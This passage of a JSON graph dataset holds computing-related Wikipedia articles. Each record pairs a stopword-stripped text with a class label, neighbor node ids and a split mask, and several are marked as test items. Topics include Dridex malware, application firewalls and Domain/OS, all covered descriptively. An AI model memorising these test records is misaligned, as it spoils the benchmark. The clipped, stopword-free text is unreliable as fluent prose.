      8822,
      7802,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      2210,
      6818,
      6821,
      5798,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      709,
      9932,
      5329,
      4308,
      10966,
      2264,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      6909,
      8447,
      1798,
      1801,
      6926,
      6415,
      785,
      1298,
      11539,
      7963,
      2339,
      6950,
      2345,
      4909,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      8523,
      7505,
      9044,
      11604,
      344,
      2394,
      8543,
      1376,
      11618,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      1480,
      466,
      10706,
      2008,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      7142,
      2536,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 2114,
    "label": 4,
    "text": "Dridex:dridex dridex also known bugat cridex form malware specializes stealing bank credentials via system utilizes macros microsoft word targets malware windows users open email attachment word excel causing macros activate download dridex infecting computer opening victim banking theft primary objective software steal banking information users infected machines immediately launch fraudulent transactions bank information software installs keyboard listener performs injection attacks 2015 theft caused software estimated £20 million united kingdom 10 million united states 2015 dridex attacks detected 20 countries early september 2016 researchers spotted initial support targeting crypto-currency wallets",
    "neighbors": [
      3867,
      10756,
      1925,
      2857,
      2508,
      6797,
      7515,
      4883,
      4471,
      10297,
      1979,
      988
    ],
    "mask": "Test"
  },
  {
    "node_id": 2115,
    "label": 3,
    "text": "Burroughs_B6x00-7x00_instruction_set:burroughs b6x00-7x00 instruction set burroughs b6x00-7x00 instruction set includes set valid operations burroughs b6500 b7500 later burroughs large systems including current 2006 unisys clearpath/mcp systems include instruction burroughs large systems including b5000 b5500 b5700 b8500 unique machines distinctive design instruction set word data associated type effect operation word depend type machines stack based point user-addressable registers would expect description run-time data structures used systems also interesting instruction set programs made 8-bit syllables may name call value call form operator may one twelve syllables length less 200 operators fit 8-bit syllables many operators polymorphic depending kind data acted given tag ignore powerful string scanning transfer edit operators basic set 120 operators remove operators reserved operating system mvst halt set operators commonly used user-level programs less 100 name call value call syllables contain address couples operator syllables either use addresses use control words descriptors stack since programmer-addressable registers register manipulating operations required architectures needed variants performing operations pairs registers since operations applied top stack also makes code files compact since operators zero-address need include address registers memory locations code stream example instruction set one add operator typical architectures require multiple operators data type example add.i add.f add.d add.l integer float double long data types architecture distinguishes single double precision numbers – integers reals zero exponent one operands tag 2 double precision add performed otherwise tag 0 indicates single precision thus tag equivalent operator .i .f .d .l extension also means code data never mismatched two operators important handling on-stack data – valc namc two-bit operators 00 valc value call 01 namc name call following six bits syllable concatenated following syllable provide address couple thus valc covers syllable values 0000 3fff namc 4000 7fff valc another polymorphic operator hits data word word loaded top stack hits irw followed possibly chain irws data word found pcw found function entered compute value valc complete function returns namc simply loads address couple onto top stack irw tag automatically set 1 static branches brun brfl brtr used two additional syllables offset thus arithmetic operations occupied one syllable addressing operations namc valc occupied two branches three long literals lt48 five result code much denser better entropy conventional risc architecture operation occupies four bytes better code density meant fewer instruction cache misses hence better performance running large-scale code following operator explanations remember b top two stack registers double precision extensions provided x registers thus top two double precision operands given ax mostly ax implied b — followed namc load pcw parameter pushes needed entr — store value b register memory addressed register — delete value stack — follow address chain necessary used string transfers usually certain character detected source string operators protected buffer overflows limited bounds descriptors used scanning strings useful writing compilers operators protected buffer overflows limited bounds descriptors special operators sophisticated string manipulation particularly business applications",
    "neighbors": [
      1474,
      1702,
      5040,
      11574,
      9911
    ],
    "mask": "None"
  },
  {
    "node_id": 2116,
    "label": 7,
    "text": "Softkinetic:softkinetic softkinetic belgian company develops gesture recognition hardware software real-time range imaging 3d cameras time-of-flight cameras founded july 2007 softkinetic provides gesture recognition solutions based technology interactive digital entertainment consumer electronics health fitness serious game industries softkinetic technology applied interactive digital signage advergaming interactive television physical therapy originally centered providing software development kits middleware softkinetic branched internal game application development establishment softkinetic studios september 2009 softkinetic progressed hardware partnering time-of-flight camera developer optrima september 2010 two companies merging reformed softkinetic march 2011 softkinetic gesture recognition software platform named iisu recognize distinguish isolate different scenic elements identify track body parts user adapt user shape posture movements existing physical model vice versa iisu compatible major real-time range imaging cameras middleware guards developers particularities hardware softkinetic hardware solution named depthsense formerly optricam line 3d time-of-flight imagers based patented cmos sensor time-of-flight tof technologies based current assisted photonic demodulation capd company patented cmos pixel technology depthsense hardware products range sensors consumer professional 3d cameras softkinetic studios collaborated numerous gesture recognition-based projects various platforms pc consoles set-top boxes arcade interactive digital signage companies orange vallée fuel industries october 8th 2015 sony corporation announced acquisition company",
    "neighbors": [
      8122
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2117,
    "label": 7,
    "text": "Thread_(network_protocol):thread network protocol thread ipv6-based low-power mesh networking technology iot products intended secure future-proof thread protocol specification available cost however requires agreement continued adherence eula states membership thread group necessary implement practice ship thread technology thread group specifications membership thread group subject annual membership fee except academic tier july 2014 thread group alliance announced working group companies nest labs subsidiary alphabet/google samsung arm holdings qualcomm nxp semiconductors/freescale silicon labs big ass solutions somfy osram tyco international lock company yale attempt thread become industry standard providing thread certification products august 2018 apple joined group raising hopes help popularize protocol thread uses 6lowpan turn uses ieee 802.15.4 wireless protocol mesh communication zigbee systems thread however ip-addressable cloud access aes encryption bsd licensed open-source implementation thread called openthread also released nest mentioned thread uses 6lowpan based use connecting router called edge router thread calls edge routers border routers unlike proprietary networks 6lowpan like network edge routers maintain application layer state networks forward datagrams network layer means 6lowpan remains unaware application protocols changes lowers processing power burden edge routers also means thread need maintain application layer thread states multiple application layers supported long low-bandwidth able operate ipv6 thread touts single point failure system however network set one edge router serve single point failure edge router another router assume role leader certain functions leader fails another router edge router take place main way thread guarantees single point failure thread promises high level security devices specifically authenticated join network communications network secured network key competing internet things iot protocols currently already wide use globally include wi-fi halow bluetooth 5 zigbee z-wave vemesh",
    "neighbors": [
      11267,
      1221,
      8262,
      4359,
      9285,
      9320,
      9863,
      10021,
      7341,
      2030,
      7983,
      10897,
      11383,
      2045,
      62
    ],
    "mask": "Test"
  },
  {
    "node_id": 2118,
    "label": 4,
    "text": "Application_firewall:application firewall application firewall form firewall controls input output and/or access application service operates monitoring potentially blocking input output system service calls meet configured policy firewall application firewall typically built control network traffic osi layer able control applications services specifically unlike stateful network firewall without additional software unable control network traffic regarding specific application two primary categories application firewalls network-based application firewalls host-based application firewalls network-based application layer firewall computer networking firewall operating application layer protocol stack also known proxy-based reverse-proxy firewall application firewalls specific particular kind network traffic may titled service name web application firewall may implemented software running host stand-alone piece network hardware often host using various forms proxy servers proxy traffic passing client server acts application layer may inspect contents traffic blocking specified content certain websites viruses attempts exploit known logical flaws client software modern application firewalls may also offload encryption servers block application input/output detected intrusions malformed communication manage consolidate authentication block content violates policies gene spafford purdue university bill cheswick laboratories marcus ranum described third generation firewall known application layer firewall marcus ranum work based firewall created paul vixie brian reed jeff mogul spearheaded creation first commercial product product released dec named dec seal geoff mulligan secure external access link dec ’ first major sale june 13 1991 chemical company based east coast usa broader darpa contract tis marcus ranum wei xu peter churchyard developed firewall toolkit fwtk made freely available license october 1993 purposes releasing freely available commercial use fwtk demonstrate via software documentation methods used company time 11 years experience formal security methods individuals firewall experience developed firewall software create common base good firewall software others build people continue roll scratch raise bar firewall software used however fwtk basic application proxy requiring user interactions 1994 wei xu extended fwtk kernel enhancement ip stateful filter socket transparent first transparent firewall known inception beyond traditional application proxy released commercial product known gauntlet firewall gauntlet firewall rated one top application firewalls 1995 1998 year acquired network associates inc nai network associates continued claim gauntlet worlds secure firewall may 2000 security researcher jim stickley discovered large vulnerability firewall allowing remote access operating system bypassing security controls stickley discovered second vulnerability year later effectively ending gauntlet firewalls security dominance key benefit application layer filtering understand certain applications protocols file transfer protocol dns web browsing detect whether unwanted protocol sneaked non-standard port whether protocol abused harmful way host-based application firewall monitor application input output and/or system service calls made application done examining information passed system calls instead addition network stack host-based application firewall provide protection applications running host application firewalls function determining whether process accept given connection application firewalls accomplish function hooking socket calls filter connections application layer lower layers osi model application firewalls hook socket calls also referred socket filters application firewalls work much like packet filter application filters apply filtering rules allow/block per process basis instead filtering connections per port basis generally prompts used define rules processes yet received connection rare find application firewalls combined used conjunction packet filter also application firewalls filter connections examining process id data packets ruleset local process involved data transmission extent filtering occurs defined provided ruleset given variety software exists application firewalls complex rulesets standard services sharing services per process rulesets limited efficacy filtering every possible association may occur processes also per process ruleset defend modification process via exploitation memory corruption exploits limitations application firewalls beginning supplanted new generation application firewalls rely mandatory access control mac also referred sandboxing protect vulnerable services examples next generation host-based application firewalls control system service calls application apparmor trustedbsd mac framework sandboxing mac os x. host-based application firewalls may also provide network-based application firewalling sandboxing systems also control file process accesses well network access commercial sandboxing systems available windows unix type oses various application firewalls available including free open source software commercial products mac os x leopard includes implementation trustedbsd mac framework taken freebsd trustedbsd mac framework used sandbox services mdnsresponder much like apparmor used sandbox services linux distributions trustedbsd mac framework provides default layer firewalling given default configuration sharing services mac os x leopard snow leopard application firewall located security preferences mac os x starting leopard provides functionality type firewall limited degree via use code signing apps added firewall list part application firewall manages network connections checking see incoming connections directed toward app firewall list applies rule block/allow specified apps list security software packages linux allowing filtering application os communication possibly by-user basis devices sold hardware network appliances instances virtual images run basic server hardware nextgeneration firewalls webapplication firewalls/loadbalancers others specialized application firewalls offer rich feature-set protecting controlling specific application specialized network appliance application firewalls web applications large-scale web server hacker attacks 1996 phf cgi exploit lead investigation security models protect web applications beginning currently referred web application firewall waf technology family early entrants market started appearing 1999 perfecto technologies ’ appshield later changed name sanctum 2004 acquired watchfire acquired ibm 2007 focused primarily ecommerce market protected illegal web page character entries netcontinuum acquired barracuda networks 2007 approached issue providing pre-configured ‘ security servers ’ pioneers faced proprietary rule-set issues business case obstacles cost barriers wide adoption however need solutions taking root 2002 open source project modsecurity run thinking stone later acquired breach security 2006 formed mission solve obstacles make waf technology accessible every company release core rule set unique open source rule set protecting web applications based oasis web application security technical committee ’ tc vulnerability work market stable well documented standardized model follow 2003 tc ’ work expanded standardized across industry work open web application security project ’ owasp top 10 list annual ranking classification scheme web security vulnerabilities model provide guidance initial threat impact way describe conditions used assessment protection tools waf list would go become industry benchmark many compliance schemes 2004 large traffic management security vendors primarily network layer space entered waf market flurry mergers acquisitions key among mid-year move f5 acquire magnifire websystems integration latter ’ trafficshield software solution former ’ big-ip traffic management system year f5 acquired appshield discontinued technology consolidation occurred 2006 acquisition kavado protegrity citrix systems ’ buying teros point waf market dominated niche providers focused web application layer security market firmly directed integrating waf products large network technologies – load balancing application servers network firewalls etc – began rush rebranding renaming repositioning waf options confusing expensive still hardly understood larger market 2006 web application security consortium formed help make sense widely divergent waf market dubbed web application firewall evaluation criteria project wafec open community users vendors academia independent analysts researchers created common evaluation criterion waf adoption still maintained today wide-scale interest waf began earnest tied 2006 pci security standards council formation compliance mandate major payment card brands amex visa mastercard etc formed pci way regulate security practices across industry curtail rampant credit card fraud taking place particular standard mandated web applications must secure either secure development use waf requirement 6.6 owasp top 10 forms backbone requirement increased focus virtualization cloud computing maximize existing resources scaling waf technology become recent milestone 2010 waf market matured market exceeding 200m size according forrester february 2010 report web application firewall 2010 beyond forrester analyst chenxi wang wrote forrester estimates 2009 market revenue waf+ market nearly 200 million market grow solid 20 2010 security risk managers expect two waf trends 2010 1 midmarket-friendly wafs become available 2 larger enterprises gravitate toward increasingly prevalent waf+ solutions also wrote imperva stand alone waf leader distributed web application firewall also called dwaf member web application firewall waf web applications security family technologies purely software-based dwaf architecture designed separate components able physically exist different areas network advance architecture allows resource consumption dwaf spread across network rather depend one appliance allowing complete freedom scale needed particular allows addition subtraction number components independently better resource management approach ideal large distributed virtualized infrastructures private public hybrid cloud models cloud-based web application firewall also member web application firewall waf web applications security family technologies technology unique due fact platform agnostic require hardware software changes host providers one require dns change wherein web traffic routed waf inspected threats thwarted cloud-based wafs typically centrally orchestrated means threat detection information shared among tenants service collaboration results improved detection rates lower false positives like cloud-based solutions technology elastic scalable typically offered pay-as-you grow service approach ideal cloud-based web applications small medium-sized websites require web application security willing able make software hardware changes systems",
    "neighbors": [
      2049,
      2563,
      10245,
      521,
      550,
      10790,
      8753,
      569,
      5178,
      9279,
      624,
      8816,
      4725,
      6773,
      10872,
      5245,
      9855,
      6797,
      2705,
      1172,
      3732,
      7337,
      3243,
      1708,
      10933,
      2238,
      4287,
      10433,
      4814,
      9423,
      10451,
      6364,
      5860,
      4843,
      10987,
      8943,
      9971,
      1273,
      5371,
      5373,
      9983,
      1792,
      3845,
      5893,
      9496,
      5404,
      6431,
      10531,
      5924,
      8998,
      3885,
      823,
      5433,
      11577,
      11073,
      1858,
      331,
      10574,
      9048,
      4953,
      2907,
      3942,
      2409,
      4972,
      4979,
      5491,
      5492,
      4480,
      3482,
      1436,
      4511,
      8106,
      939,
      5057,
      7121,
      10708,
      4568,
      8668,
      6625,
      5608,
      8176,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2119,
    "label": 8,
    "text": "SeeVolution:seevolution seevolution real-time website analytic web service shows heatmap website detailing visitors clicking mouse moves scrolls data used allow webmasters see areas website visitors using seevolution founded edo cohen 2010 company began offering service free website owners 2011 company introduced premium features also kept free platform 2011 company secured 530,000 angel financing also passed milestone installed 2,500 website investment brought total funding angel investors 730,000 order keep demand product company secured additional round angel funding 2012 seevolution uses x-ray tool capture data users interact different parts website data collected includes mouse clicks data entries navigational information data used create heatmap overlays webpage show visitors moving mouse clicking far scroll specific page allows user see data real-time also provides event notifications product works installing simple javascript website monitored logging heatmap overlay show site showing clicks page scrolls",
    "neighbors": [
      10020,
      3462,
      6576,
      119,
      1943
    ],
    "mask": "Test"
  },
  {
    "node_id": 2120,
    "label": 2,
    "text": "Domain/OS:domain/os domain/os discontinued operating system used apollo/domain line workstations manufactured apollo computer inc. late 1980s successor one previously used aegis one early distributed operating systems hewlett-packard supported operating system short time purchased apollo later ended product line favor hp-ux unix variant hp ended final support domain/os january 1 2001 aegis distinctive mainly designed networked computer distinct competitors essentially standalone systems added network features prime examples file system fully integrated across machines opposed unix even draws distinction file systems host system others user administration system fundamentally network-based basic orientation even standalone apollo machine could configured without network card otherwise aegis similar workstations time used high-resolution graphics screen mouse provide type gui however lacked almost tools directory browser taken granted today single exception notepad-like text editor instead user given command line window problem since usually machine would bought specific purpose user would simply invoke one two packages interested typically cad dtp system administrators expected work solely command line aegis command interface similar unix command line interpreter understood pipes redirection scripting etc. invoked commands separate programs actual commands designed easier remember use sometimes cryptic unix equivalents wildcards expected expanded individual commands rather command line interpreter one noticeable useful feature ability embed environment variables symbolic links example allowed user switch different versions unix simply setting systype environment variable accordingly symbolic links pointed correct versions files domain/os implemented functionality derived system v early bsd unix systems improved aegis providing core os upon user could install three environments aegis system v unix bsd unix done order provide greater compatibility unix aegis version sr9 immediately preceded domain/os numbered sr10 optional product called domain/ix available provided similar capability drawbacks principally fact core administrative tasks still required aegis commands also sr9 permissions system fully compatible unix behaviour domain/os provided new administrative commands complex permissions system could configured behave properly three environments domain/os also provided improved version x window system complete vue hp predecessor cde performance tended poor user upgrading aegis sr9 domain/os sr10 slowed fact many users saw requirement increased disk space requirements new complex administration tools sr10 poorer performance buggy nature sr10.0 although later versions much reliable however later hp/apollo machines dn10000 dn2500 4xx series workstations could run sr10 unlike many operating systems day written c assembly language many domain/os components written pascal compilers users available c c++ pascal fortran distributed administration features domain/os built around remote procedure call system called ncs rpc though rpc later end-of-lifed operating system hp contributed rpc open software foundation incorporated interface definition language idl dce product technology later used corba one original developers went work microsoft developed msrpc fairly compatible clone today forms central component windows systems traces history seen day protocol names ncacn_http apollo domain 8.0 released 1984 10.3.5 1988-91 domain/os incorporated several ideas multics including single-level store dynamic linking",
    "neighbors": [
      6529,
      2179,
      6787,
      5384,
      6412,
      6675,
      5397,
      1304,
      9114,
      3487,
      9762,
      7847,
      3241,
      7983,
      3248,
      2995,
      9780,
      9141,
      10547,
      823,
      9784,
      1593,
      9151,
      10436,
      8262,
      6727,
      5452,
      8524,
      5969,
      3960,
      477,
      6369,
      6498,
      9441,
      10465,
      3571,
      5492,
      6772,
      2424,
      633,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2121,
    "label": 3,
    "text": "City_Connection:city connection city connection platform arcade game developed published jaleco 1985 player controls clarice honda city hatchback must paint every section highway throughout twelve stages taking place famous city around world clarice constantly pursuit police cars take launching oil cans temporary stunning ramming car released north america kitkorp cruisin jaleco would port game nintendo entertainment system nes msx nes release received mixed positive reviews although digital re-releases would receive negative reception nes release would included jaleco collection vol 1 2003 jajamaru jr. denshoki jaleco memorial year later hamster corporation released digital version wii virtual console 2008 playstation 4 2015 latter arcade archives label rights city connection currently owned company named city connection following bankruptcy jaleco parent company 2014 mobile phone sequel city connection rocket available i-mode 2004 player takes control clarice blue-haired teen honda city hatchback efforts travel world order find perfect man clarice traverses twelve scrolling stages based famous locations across world including japan china paris easter island twelfth stage game simply loop back first higher difficulty clear stage player must paint roads driving across changing pavement color white green car jump large gaps reach higher sections stage clarice constantly pursuit police cars must avoid flag-waving cats block moving past collecting oil cans found stage player shoot police cars temporary stun knock stage ramming cats invulnerable defeated means player remains stage extended period time spikes extrude ground instantly causing lose life occasion red-colored balloon may appear stage player collect three balloons warped new area granted large sum bonus points city connection developed jaleco first released japanese arcades july 1985 car player controls honda city hatchback believed source game title north america game licensed kitkorp released cruisin ’ though identical original aside title song used clarice hits one flag-waving cats “ flohwalzer ” known japan “ neko funjatta ” lit “ stepped cat ” game one first use new music track stage rather reusing single song one stage features remix song “ highway star ” deep purple ports city connection released nintendo entertainment system nes famicom zx spectrum msx nes version replaces clarice unnamed male protagonist alongside minor differences famicom release included japan-only playstation compilation jaleco collection vol 1 2003 well game boy advance compilation jajamaru jr. denshoki jaleco memorial year later digital re-release nes version ported wii virtual console 2008 later 3ds wii u virtual console services 2013 mobile phone version released 23 september 2002 arcade version ported mediakite microsoft windows 2003 published first pccw japan later re-published 2004 jaleco 2003 mobile port titled city connection dx released japanese i-mode online service 2014 hamster corporation released digital version game arcade archives series playstation 4 soon released nintendo switch 2018 nes version particular would receive mixed reception allgame gave positive review nes release applauding gameplay graphics concluding “ game revolutionary means deserves played. ” japanese magazine yuge ranked one 100 best family computer games time praising visuals gameplay music computer entertainer us concluded game enjoyable short run doubt sufficient staying power keep gamers playing reviewing nintendo 3ds virtual console digital release nes version nintendo life ign would give lukewarm reception would critcize graphics music simplistic alongside labeling gameplay difficult understand newcomers nintendo life gave similar negative response wii u virtual console port nes release concluding steer clear one eurogamer wrote wii virtual console port nes version “ certainly worth getting passionate sequel city connection rocket developed studio runba released japanese mobile phones 2004 available jaleco i-mode game places clarice spy secret organization capture criminal leaders around world rather painting sections road clarice must collect briefcases placed stage whilst avoiding police cars types enemies game bundled city connection dx re-release appli-archives series playstation vita available playstation mobile service service closed september 2015 delisting game playstation store supported devices clarice would make appearance playable character gunbare game tengoku game paradise 2 misspelled “ claris ” well sega saturn re-release game paradise crusin ’ mix downloadable content rights city connection currently owned japanese developer named city connection purchased jaleco video game assets following bankruptcy parent company game yarou 2014",
    "neighbors": [
      6797,
      9006,
      1776,
      10064,
      10931,
      5942
    ],
    "mask": "None"
  },
  {
    "node_id": 2122,
    "label": 4,
    "text": "CESG_Claims_Tested_Mark:cesg claims tested mark cesg claims tested mark abbreviated cct mark cctm formerly csia claims tested mark uk government standard computer security cct mark based upon framework vendors make claims security attributes products and/or services independent testing laboratories evaluate products/services determine actually meet claims words cct mark provides quality assurance approach validate whether implementation computer security product services performed appropriate manner cct mark developed auspices uk government central sponsor information assurance csia part cabinet office intelligence security resilience isr function role providing specialist input cct mark fell cesg uk national technical authority nta information security assumed responsibility scheme whole 7 april 2008 testing laboratories must comply iso 17025 united kingdom accreditation service ukas carrying accreditation cct mark often compared international common criteria cc simultaneously correct incorrect september 2010 cesg announced product assurance element cct mark overtaken new commercial product assurance cpa approach unclear yet whether cct mark remain existence assurance information security services",
    "neighbors": [
      8904,
      10962,
      2558,
      9502
    ],
    "mask": "Test"
  },
  {
    "node_id": 2123,
    "label": 2,
    "text": "Mike_Shapiro_(programmer):mike shapiro programmer michael w. mike shapiro american computer programmer worked operating systems storage sun microsystems oracle emc working sun microsystems shapiro developed pgrep modular debugger mdb dtrace fault management diagnosis software sun solaris operating system shapiro dtrace team received technology innovation award overall gold medal innovation dtrace wall street journal 2006 dtrace also recognized usenix software tools user group stug award 2008 starting 2006 shapiro led sun engineering effort build commercial storage product using solaris sun zfs filesystem announced 2008 oracle corporation acquired sun shapiro managed engineering storage products shapiro announced departure oracle 2010 blog posting revealed several years later member founding team dssd emc purchased startup developed dssd software architecture fellow sun engineer jeff bonwick served dssd vice president software shapiro co-author nvm express fabrics storage protocol announced 2014 emc acquired dell technologies dssd group folded emc storage product division 2017",
    "neighbors": [
      8599,
      9665,
      9343,
      11506,
      10643,
      10615,
      8671
    ],
    "mask": "None"
  },
  {
    "node_id": 2124,
    "label": 3,
    "text": "Vadem_Clio:vadem clio vadem clio refers handheld pc ran windows ce h/pc pro 3.0 wince core os 2.11 released 1999 data evolution corporation currently owns rights clio clio convertible tablet computer designed vadem corporation san jose ca runs microsoft ’ windows ce operating system swingtop pivoting arm 180 degree screen rotation allowed unit used touch screen tablet traditional notebook keyboard clio could run 12 hours single charge together sony vaio one first full-sized portable computers measured inch 2.2cm thick platform conceived created within vadem skunkworks team led edmond ku clio first developed without knowledge microsoft presented bill gates ce team led definition jupiter class ce platform handwriting software vadem paragraph group acquired sgi team provided handwriting recognition technology used apple newton originally introduced 1998 clio product line numerous awards accolades mobile computing communications ’ “ best handheld design keyboard form factor ” pc week “ best comdex ” finalist home office computing ’ silver award mobility award “ notebook computing pc companion ” winner industrial designs excellence awards idea —silver business industrial equipment idc ’ “ best design ” addition clio featured hundreds articles appeared cover number magazines including pen computing business week swing arm rotating screen concept conceived edmond ku vadem engineering director physical design creation frogdesign inc. industrial designers sonia schieffer josh morenstein mechanical engineers richard huang jenny schlee enclosure made plastic injection molded carbon fiber reinforced polyamide nylon swing-arm die-cast aluminium stiffness strength video signals relied upon double-sided flex-circuit routed base arm display panel",
    "neighbors": [
      321,
      7234
    ],
    "mask": "None"
  },
  {
    "node_id": 2125,
    "label": 2,
    "text": "Feather_Linux:feather linux feather linux created robert sullivan knoppix-based operating system fits 128 mb older versions made fit within 64 mb boots either cd usb flash drive fluxbox desktop environment wide range desktop rescue software load entirely ram enough ram available installed hard drive feather linux contains gtk+ applications abiword pidgin feather linux tried include software people would frequently using desktop available x86 architecture run 486 higher requires 16mb ram run console 24mb ram run x server according distrowatch feather linux discontinued final release 2005-07-04 feather linux home page longer available feather linux damn small linux share common goals",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      6436,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7152,
      7920,
      8177,
      9074,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 2126,
    "label": 0,
    "text": "Hans_Uszkoreit:hans uszkoreit hans uszkoreit german computational linguist hans uszkoreit studied linguistics computer science technical university berlin university texas austin studying austin also worked research associate large machine translation project linguistics research center received ph.d. linguistics university texas worked computer scientist artificial intelligence center affiliated center study language information stanford university nowadays teaching professor computational linguistics saarland university moreover serves scientific director german research center artificial intelligence dfki heads dfki language technology lab hans uszkoreit 1988 called position saarland university work field computational linguistics created department computational linguistics phonetics 1989 elected head language technology lab dfki uszkoreit also co-founder principal investigator special collaborative research division sfb 378 “ resource-adaptive cognitive processes ” european postgraduate program language technology cognitive systems ’ co-founder professor member international committee computational linguistics european academy sciences past president european association logic language information fellow board directors european network language speech also european language resources association",
    "neighbors": [
      1890,
      9379,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 2127,
    "label": 6,
    "text": "Relative_Record_Data_Set:relative record data set relative record data set rrds type data set organization used vsam computer data storage system records accessed based ordinal position file relative record number rrn example desired record accessed might 42nd record file 999 total concept rrds similar sequential access method access data random access dynamic access rrds consists data records sequence record number indicating record logical position data set program access records randomly using positional number access records sequentially unlike key sequenced data set rrds keys program access records key value keys may used access records rrds defining alternate index",
    "neighbors": [
      2104,
      1801,
      2077
    ],
    "mask": "None"
  },
  {
    "node_id": 2128,
    "label": 4,
    "text": "Piggybacking_(security):piggybacking security security piggybacking similar tailgating refers person tags along another person authorized gain entry restricted area pass certain checkpoint either electronic physical act may legal illegal authorized unauthorized depending circumstances however term often connotation illegal unauthorized act describe act unauthorized person follows someone restricted area without consent authorized person term tailgating also used tailgating implies without consent similar car tailgating another vehicle freeway piggybacking usually implies consent authorized person piggybacking came public attention particularly 1999 series weaknesses exposed airport security study showed majority undercover agents attempting pass checkpoints bring banned items planes board planes without tickets successful piggybacking revealed one methods used order enter off-limits areas piggybackers various methods breaching security may include piggybacking regarded one simpler forms social engineering",
    "neighbors": [
      2737,
      11198,
      7957,
      8134
    ],
    "mask": "Test"
  },
  {
    "node_id": 2129,
    "label": 6,
    "text": "DCache:dcache dcache system storing retrieving huge amounts data distributed among large number heterogenous server nodes single virtual filesystem tree variety standard access methods dcache open source software built java used among others ten fourteen tier1 sites cern store data large hadron collider dcache provides methods exchanging data backend tertiary storage systems well space management pool attraction dataset replication hot spot determination recovery disk node failures connected tertiary storage system cache simulates unlimited direct access storage space data exchanges underlying hierarchical storage management system performed automatically invisibly user beside protocols specific high-energy physics data dcache accessed via nfsv4.1 well webdav",
    "neighbors": [
      10721,
      3522,
      2395
    ],
    "mask": "Test"
  },
  {
    "node_id": 2130,
    "label": 1,
    "text": "MyRocks:myrocks myrocks open-source software developed facebook order use mysql features rocksdb implementations based oracle mysql 5.6 percona making myrocks accessible users bringing percona server starting version 10.2.5 mariadb includes myrocks alpha-stage storage engine library maintained facebook database engineering team rocksdb optimized fast low-latency storage myrocks aimed keeping storage savings efficient myrock ’ efficiency focuses better space efficiency better write efficiency better read efficiency benchmark tests 3 different instances – myrocks compressed innodb uncompressed innodb compressed 8 kb page size – found ssd database storage means less space used higher endurance storage time officially supported subset platforms compiler toolsets verify builds best effort made support following oss",
    "neighbors": [
      9687,
      1222,
      11017,
      7147,
      7339,
      8683,
      7022,
      9518,
      9010,
      8691,
      4598,
      5047,
      6555,
      7359
    ],
    "mask": "Test"
  },
  {
    "node_id": 2131,
    "label": 7,
    "text": "Monaca_(software):monaca software monaca software tools services solution building deploying html5 mobile hybrid apps built top open source apache cordova formerly known phonegap monaca provides full-suite resources including cloud ide local development tools debugger backend support monaca cloud-based ide builds html5 hybrid mobile apps ios android windows chrome apps using html css javascript multi-platform app development utilizes native language components functionalities monaca framework agnostic provides integration onsen ui ionic framework building user interface monaca releases vue.js support onsen ui monaca html5 hybrid application advancement stage reported arrival onsen ui vue onsen ui open source ui structure building half half versatile applications dynamic web applications vue.js dynamic javascript system onsen ui engineers without much stretch form versatile ui vue.js portable applications",
    "neighbors": [
      803,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 2132,
    "label": 2,
    "text": "PWB/UNIX:pwb/unix programmer workbench pwb/unix early discontinued version unix operating system created bell labs computer science research group stated goal provide time-sharing working environment large groups programmers writing software larger batch processing computers prior 1976 unix development project small group researchers department 1127 bell labs usefulness unix departments bell labs evident company decided develop version unix tailored support programmers production work research programmer workbench started 1973 evan ivie rudd canaday support computer center 1000-employee bell labs division would largest unix site several years pwb/unix provide tools teams programmers manage source code collaborate projects team members also introduced several stability improvements beyond research unix support nroff troff text formatters pwb users managed source code pdp-11 unix systems programs often written run legacy operating systems reason pwb included software submitting jobs ibm system/370 univac 1100 series xds sigma 5 computers 1977 pwb supported user community 1100 users business information systems programs bisp group bell labs two major releases programmer workbench produced pwb/unix 1.0 released july 1 1977 based version 6 unix pwb 2.0 based version 7 unix operating system advertised bell system software late 1981 edition 1.0 still price list educational institutions 1984 pwb/unix later incorporated commercial unix system iii unix system v releases notable firsts pwb include",
    "neighbors": [
      2179,
      6787,
      6412,
      11023,
      5397,
      1304,
      3487,
      3488,
      8991,
      5156,
      7460,
      3241,
      4398,
      7983,
      3248,
      5936,
      11442,
      2995,
      9141,
      11001,
      823,
      9784,
      9151,
      11075,
      10436,
      8262,
      3323,
      6369,
      9444,
      5992,
      7666,
      2035,
      5492,
      2424,
      633,
      4859,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2133,
    "label": 4,
    "text": "Extensible_Threat_Management:extensible threat management extensible threat management xtm form unified threat management typically includes additional security control features network bandwidth traffic shaping dynamic routing load balancing vpn voip security",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 2134,
    "label": 2,
    "text": "List_of_commercial_products_based_on_Red_Hat_Enterprise_Linux:list commercial products based red hat enterprise linux number commercial products based red hat enterprise linux rhel information products version rhel based often difficult come since fact widely publicised sometimes possible run 'uname -r command get kernel release cross-reference rhel version history",
    "neighbors": [
      7938,
      7812,
      8326,
      4360,
      9353,
      4493,
      2195,
      11155,
      1813,
      10780,
      1694,
      3618,
      6055,
      4011,
      9646,
      9855,
      561,
      823,
      5178,
      59,
      9660,
      10817,
      2375,
      10058,
      5067,
      7248,
      8147,
      2260,
      8668,
      1761,
